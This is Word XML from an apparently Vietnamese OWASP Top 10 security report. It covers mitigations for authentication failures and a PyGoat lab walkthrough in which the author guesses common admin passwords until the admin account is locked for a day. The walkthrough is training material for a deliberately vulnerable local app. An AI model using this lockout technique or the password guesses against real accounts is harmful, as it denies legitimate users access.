    <w:p w14:paraId="32371383" w14:textId="2BF63542" w:rsidR="00E868E7" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Giới hạn hoặc tăng thời gian chờ giữa các lần đăng nhập thất bại</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">, ghi lại tất cả các lần thất bại và cảnh báo cho quản trị viên khi phát hiện các cuộc tấn công như credential stuffing hay brute force. </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Sau ba lần đăng nhập thất bại liên tiếp, khóa tài khoản trong 10 phút để ngăn chặn các cuộc tấn công tự động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EEA957" w14:textId="0A214371" w:rsidR="00BD0662" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng trình quản lý phiên máy chủ an toàn được tích hợp sẵn</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">, tạo ra một ID phiên mới với độ phức tạp cao sau khi đăng nhập. Không nên đặt session ID trong URL. ID cũng nên được lưu trữ an toàn và vô hiệu hóa sau khi đăng xuất, không hoạt động hoặc khi hết thời gian. </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Sau khi người dùng đăng xuất, session ID cũ phải bị xóa và không thể tái sử dụng trong các phiên tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D355EB" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00E868E7" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc182909859"/>
      <w:r w:rsidRPr="00E868E7">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="22355EFF" w14:textId="1DEA3A2A" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc182909860"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="645A8D9A" w14:textId="0B737BAE" w:rsidR="004E0865" w:rsidRPr="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3007D" w14:textId="4A6DC45E" w:rsidR="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/auth_failure/lab2/admin12983gfugef81e8yeryepanel</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3574A461" w14:textId="1E27A167" w:rsidR="00931C64" w:rsidRPr="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>Identification and Authentication Failures</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534CD64" w14:textId="317DE2B3" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>Ứng dụng web cung cấp tài khoản admin và mật khẩu dưới dạng hash. Kẻ tấn công có thể không cần đăng nhập, mà chỉ cần thực hiện cuộc tấn công để phá hoại để chặn tài khoản admin truy cập vào hệ thống trong 1 ngày.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B839D0" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8B655" w14:textId="37129D93" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00FB5E78" w:rsidP="00620A59">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00620A59">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:t>ruy cập vào lab và nhận thấy rằng một trang đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C679C98" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r w:rsidRPr="00F42F1D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E079905" wp14:editId="64863D31">
            <wp:extent cx="6115050" cy="2649855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84406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6678" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2649855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF3228" w14:textId="3FD3FF0B" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00FB5E78" w:rsidP="00620A59">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00620A59">
        <w:t>Tr</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:t xml:space="preserve">uy cập vào tài khoản admin với </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00F42F1D">
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00F42F1D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00931C64" w:rsidRPr="00F42F1D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>admin_pygoat@pygoat.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00931C64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">nhưng còn password </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">thì </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:t>không biết, bởi vì đã được mã hóa dạng hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C64188C" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE65B9E" wp14:editId="7C557591">
            <wp:extent cx="6115050" cy="340360"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1722184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84360" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="340360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="570EA1E7" w14:textId="26760DF5" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00620A59" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:t>hử đăng nhập các mật khẩu thông thường khác như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765FC3F" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00620A59">
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8AFB37" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00620A59">
        <w:t>administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D45043" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00620A59">
        <w:t>admin123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017E7AB" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00620A59">
        <w:t>administrator1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F4FFB" w14:textId="1D62DFF1" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r>
        <w:t xml:space="preserve">Sau khi thực hiện thử </w:t>
      </w:r>
      <w:r w:rsidR="00620A59">
        <w:t xml:space="preserve">thì </w:t>
      </w:r>
      <w:r>
        <w:t>nhận thấy như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C2740" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758C2C37" wp14:editId="1D893397">
            <wp:extent cx="6115050" cy="2792730"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1105028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28729" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2792730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A9EA2" w14:textId="3C3FA82A" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00620A59" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">Tiếp tục </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00620A59">
        <w:t>thử đăng nhập một vài lần tiếp theo, cụ thể là trên 5 lần thì nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4ABA2" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r w:rsidRPr="00165C0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="338CFA34" wp14:editId="42676845">
            <wp:extent cx="6115050" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2025383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383920" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2823210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15692638" w14:textId="39FC1245" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">Một thông báo không cho phép đăng nhập. </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>iểm tra code thì nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478EBB27" w14:textId="3315014F" w:rsidR="00931C64" w:rsidRPr="009D0400" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r w:rsidRPr="00165C0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1417EE91" wp14:editId="7527FFCC">
            <wp:extent cx="6115050" cy="2945765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="482940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40917" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2945765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">Việc đăng nhập 5 lần này có vấn đề thì sẽ lock tài khoản 1440 phút </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:sym w:font="Wingdings" w:char="F0F3"/>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> 24h </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:sym w:font="Wingdings" w:char="F0F3"/>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> 1 ngày. Như vậy</w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">, việc thực hiện các lần đăng nhập trước đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>đã thực hiện khoá thành công tài khoản admin khi mà cố tình đăng nhập sai tài khoản adm</w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>n quá số lần được cấu hình trước đó. Lúc này, thực hiện thử thách thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE91CC" w14:textId="5CA4B7B8" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>lỗ hổng n</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>y c</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> thể tạo </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>iều kiện cho kẻ tấn c</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>ng thực hiện cuộc tấn c</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>ng m</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> kh</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">ng cần </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đă</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">ng nhập, từ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đó</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>ặt ra nguy c</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ơ</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> lớn về việc x</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>â</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>m nhập v</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>o hệ thống, chiếm quyền kiểm so</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>t, hoặc truy cập tr</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>i ph</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>p v</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>o th</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>ng tin quan trọng của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E84C99" w14:textId="54415E3F" w:rsidR="00931C64" w:rsidRPr="00620A59" w:rsidRDefault="00931C64" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00620A59">
        <w:t>ó thể quản lý phiên người dùng nhưng có nhược điểm về IP, cookie, session. Vì vậy, cách khắc phục tốt hơn là cần thực hiện việc thông báo đăng nhập thông qua các kênh như email hoặc các thiết bị đã đăng nhập trước đó. Đồng thời, cần thông báo đăng nhập từ các thiết bị và can thiệp vào truy vấn IP của thiết bị để kiểm tra tính hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B781271" w14:textId="77777777" w:rsidR="00620A59" w:rsidRDefault="00620A59">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BFE79" w14:textId="6AC966C2" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc182909861"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A08:2021 – Software and Data Integrity Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="4DBEA74E" w14:textId="5B451084" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc182909862"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="7FC4142E" w14:textId="36D8F423" w:rsidR="002A3AFF" w:rsidRPr="00620A59" w:rsidRDefault="00620A59" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00620A59">
        <w:t>Các lỗi về tính toàn vẹn của phần mềm và dữ liệu liên quan đến mã và c</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00620A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ơ</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> sở hạ tầng không bảo vệ chống lại các vi phạm về tính toàn vẹn. </w:t>
      </w:r>
    </w:p>
